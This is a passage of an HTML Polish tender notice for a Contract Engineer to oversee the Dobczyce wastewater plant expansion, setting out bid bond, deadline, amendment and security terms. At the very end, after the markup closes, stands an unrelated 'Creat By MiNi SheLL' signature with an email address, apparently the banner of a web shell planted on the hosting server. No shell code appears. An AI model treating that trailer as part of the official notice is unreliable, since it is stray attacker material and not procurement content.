w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert według wzoru stanowiącego załącznik nr 4 do niniejszej IDW. 
b)wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowani tymi osobami według wzoru stanowiącego załącznik nr 5 do niniejszej IDW. 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie zamówienia warunek można spełniać łącznie)
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 
15 000,00 PLN.
(słownie: piętnaście tysięcy złotych)
Forma wadium.
1)Wadium może być wniesione w jednej lub kilku następujących formach:
a)pieniądzu;
b)gwarancjach bankowych;
c)gwarancjach ubezpieczeniowych;
2)W przypadku składania przez Wykonawcę wadium w formie gwarancji bankowej/ ubezpieczeniowej winna ona zawierać następujące elementy:
a)wskazanie Wykonawcy, czyli zleceniodawcy gwarancji, wskazanie Zamawiającego, czyli beneficjenta gwarancji, tj. 
Urząd Gminy i Miasta Dobczyce, ul. Rynek 26, 32- 410 Dobczyce
b)wskazanie Gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie jego  siedziby,
c)dokładną nazwę niniejszego postępowania i wskazanie sumy gwarancyjnej,
d)określenie terminu ważności gwarancji,
e)zobowiązanie banku/towarzystwa ubezpieczeniowego do nieodwołalnego 
i bezwarunkowego zapłacenia pełnej sumy wadium na pierwsze pisemne żądanie Zamawiającego w przypadku gdy zajdą ku temu okoliczności wymienione w pkt.6.
Wadium wnoszone przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia jest wnoszone w imieniu i na rzecz całego konsorcjum
3.Miejsce i sposób wniesienia wadium.
1)Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego, tj.:
Urząd Gminy i Miasta Dobczyce, ul. Rynek 26 
32-410 Dobczyce
Bank Spółdzielczy w Dobczycach 
87 8602 0000 0000 0000 0752 0015
z dopiskiem:  Wadium Inżynier Kontraktu  dla zadania pn.: Rozbudowa oczyszczalni ścieków w Dobczycach realizowanego w ramach projektu Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce - Nr.POIS.02.03.00-00-005/16 Do oferty należy dołączyć kopię polecenia przelewu.
2)W przypadku wniesienia wadium w pozostałych formach, kopię dokumentu wadium należy dołączyć do oferty. Nie jest wskazane trwałe wpinanie oryginału dokumentu wadialnego do oferty. Oryginał winien być dołączony do oferty w taki sposób aby było możliwe jego zwrócenie w sytuacjach określonych ustawą bez konieczności naruszenia integralności oferty.
4.Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
W przypadku wniesienia wadium w pieniądzu za pomocą przelewu bankowego, dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę. Drugim warunkiem koniecznym jest wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
Zwrot wadium czegółowo opisany został w pkt 12 częśći I SIWZ</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zmiany Umowy wymagają pisemnego aneksu pod rygorem nieważności.
2.Przewiduje się możliwość dokonania zmian  Umowy w przypadku wystąpienia niżej wymienionych sytuacji:
a)zaistnienia w treści Umowy omyłki pisarskiej lub rachunkowej;
b)zaistnienia Siły Wyższej, o której mowa w art. 26 Warunków Ogólnych Umowy;
c)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy lub świadczenia Stron;
d)gdy konieczność wprowadzenia zmian do umowy będzie następstwem okoliczności niezależnych od działania Stron Umowy a w szczególności związanych z niewyłonieniem lub opóźnionym wyłonieniem wykonawcy dla Kontraktu z zastrzeżeniem, iż zmiana Umowy prowadząca do zmiany wynagrodzenia Wykonawcy, może nastąpić wyłącznie w przypadku przedłużenia okresu mobilizacji o więcej niż 6 miesięcy; 
e)gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w Umowie pomiędzy Zamawiającym a Wykonawcą Kontraktu o którym mowa w §  1 ust.1 Umowy, w tym skutkującą koniecznością świadczenia usług w przedłużonym okresie wykonawstwa Robót w związku 
z koniecznością przedłużeniem okresu rzeczowej realizacji prac projektowych lub Robót objętych nadzorowanym Kontraktem wskazanymi w §1 ust 1 Umowy, 
z zastrzeżeniem, iż zmiana Umowy prowadząca do zmiany wynagrodzenia Wykonawcy może nastąpić wyłącznie w przypadku przedłużenia okresu realizacji Kontraktu na Roboty o więcej niż 6 miesiące; 
f)gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w Umowie pomiędzy Zamawiającym a Wykonawcą Kontraktu, o którym mowa w §1 ust. 1 Umowy, w tym skutkującą koniecznością świadczenia usług podobnych polegających na powtórzeniu usług objętych zakresem niniejszej Umowy w związku z koniecznością udzielenia Wykonawcy Robót zamówień podobnych lub dodatkowych; 
g)gdy konieczność wprowadzenia zmian będzie następstwem ewentualnego rozwiązania Umowy pomiędzy Zamawiającym a Wykonawcą Kontraktu, o którym mowa w §1 ust. 1 Umowy; przed ukończeniem Robót i wynikającą z tego faktu koniecznością dostosowania Umowy i obowiązków Konsultanta do zaistniałej sytuacji lub koniecznością skrócenia okresu realizacji Usług 
i koniecznością dostosowania wysokości należnego wynagrodzenia;
h)powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony;
i)zmiany obowiązującej stawki VAT z tym, że wynagrodzenie netto pozostanie nie zmienione;
j)skrócenia czasu realizacji Umowy odpowiednio do czasu faktycznej realizacji Kontraktu, o którym mowa w §1 ust. 1 Umowy; w szczególności w przypadku wcześniejszego niż przewidywany terminu zakończenia Kontraktu;
k)przedłużenia czasu realizacji Umowy odpowiednio do czasu faktycznej realizacji Kontraktu, o którym mowa w §1 ust. 1 Umowy; z uwzględnieniem możliwości kwalifikowania kosztów zgodnie z umową o dofinansowanie Projektu, o ile nie spowoduje to zwiększenia wynagrodzenia Wykonawcy określonego w § 4 ust. 1  Umowy.
l)zmiany w kolejności i terminach wykonywania Usług, wymuszone okolicznościami niedającymi się wcześniej przewidzieć, w tym zmianę terminu końcowego realizacji Umowy;
m)zmiany wynikające z innych przyczyn zewnętrznych niezależnych od Konsultanta lub Zamawiającego skutkujące niemożnością wykonywania Usług przez Konsultanta lub wykonywania innych czynności przewidzianych Umową, przykładowo spowodowane przez; działania osób trzecich (np. właściwych instytucji, organów) lub warunkami atmosferycznymi uniemożliwiającymi realizację Umowy , stanowiącymi Siłę Wyższą;
n)zmiany osób wyznaczonych do kierowania albo nadzorowania budowy/ robót;
o)zmiany uzasadnione okolicznościami, o których mowa w art. 3571 Kodeksu cywilnego;
p)inną okolicznością prawną, ekonomiczną lub techniczną skutkującą niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ.
2.Zmiany zostaną wprowadzone zgodnie z metodologia zmian opisaną w art. 14
 Warunkach Ogólnych Umowy
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />Zamawiajcy zaleca, aby informacje zastrzeżone jako tajemnica przedsibiorstwa były przz Wykonacę złozone  oddzielnej wewnętrznej koperie z oznakowaniem "tajemnica rzedsiebiorstwa" lub spiete (zszyte)oddzielnie od poostałych , jawnych elementów oferty<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/04/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.Ofertę należy złożyć w siedzibie Zamawiającego   Urząd Gminy i Miasta Dobczyce, ul. Rynek 26, 32-410 Dobczyce  sekretariat Urzędu , pokój 102 w nieprzekraczalnym terminie do dnia:  20.04.2017.r. do godz. 11:00
2.Ofertę należy złożyć w nieprzezroczystej, zabezpieczonej przed otwarciem kopercie (paczce). Kopertę (paczkę) należy opisać następująco:
Urząd Gminy i Miasta Dobczyce, ul Rynek 26, 32  410 Dobczyce 
Oferta w postępowaniu na:
Inżyniera Kontraktu dla zadania pn.: Rozbudowa oczyszczalni ścieków w Dobczycach realizowanego w ramach projektu Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce - Nr.POIS.02.03.00-00-005/16 
Nie otwierać przed dniem: 20.04.2017r. godz. 11:15.
3.Jeżeli opakowanie oferty nie będzie oznaczone w sposób opisany w ppkt. 2 i 3 powyżej, Zamawiający w żadnym wypadku nie będzie odpowiedzialny za nieodpowiednie jej przyjęcie lub przedwczesne otwarcie.
Otwarcie ofert nastąpi w siedzibie Zamawiającego  Urząd Gminy i Miasta Dobczyce,ul. Rynek 26, 32- 410 Dobczyce, Sala posiedzeń  w dniu: 20.04.2017 r. godz. 11:15. Warunki realizacji zamówienia określa częśćII SWZ - Projek umowy 
Zabezpieczenie należytego wkonania umowy
1.Tytułem zabezpieczenia należytego wykonania Umowy ustala się zabezpieczenie w wysokości 20 % całkowitego wynagrodzenia ofertowego (cena oferty brutto).
2.Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy oraz roszczeń z tytułu rękojmi i gwarancji. 
3.Wniesienie zabezpieczenia należytego wykonania Umowy jest warunkiem koniecznym zawarcia umowy w sprawie niniejszego zamówienia. 
4.Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:  
1)pieniądzu;
2)gwarancjach bankowych;
3)gwarancjach ubezpieczeniowych;
5.Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.
6.W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.
7.Jeżeli zabezpieczenie wniesiono w pieniądzu, zamawiający przechowuje je na rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu, pomniejszone o koszt prowizji bankowej za przelew pieniędzy na rachunek bankowy wykonawcy oraz o koszty prowadzenia rachunku bankowego.
8.W trakcie realizacji umowy wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w ust. 3., z zastrzeżeniem, iż zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.
9.Zamawiający zwróci zabezpieczenie należytego wykonania umowy w terminie 30 dni od dnia wykonania Umowy i uznania jej przez Zamawiającego za należycie wykonaną. Warunki i termin zwrotu określają warunki umowy zawarte w II Części SIWZ.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com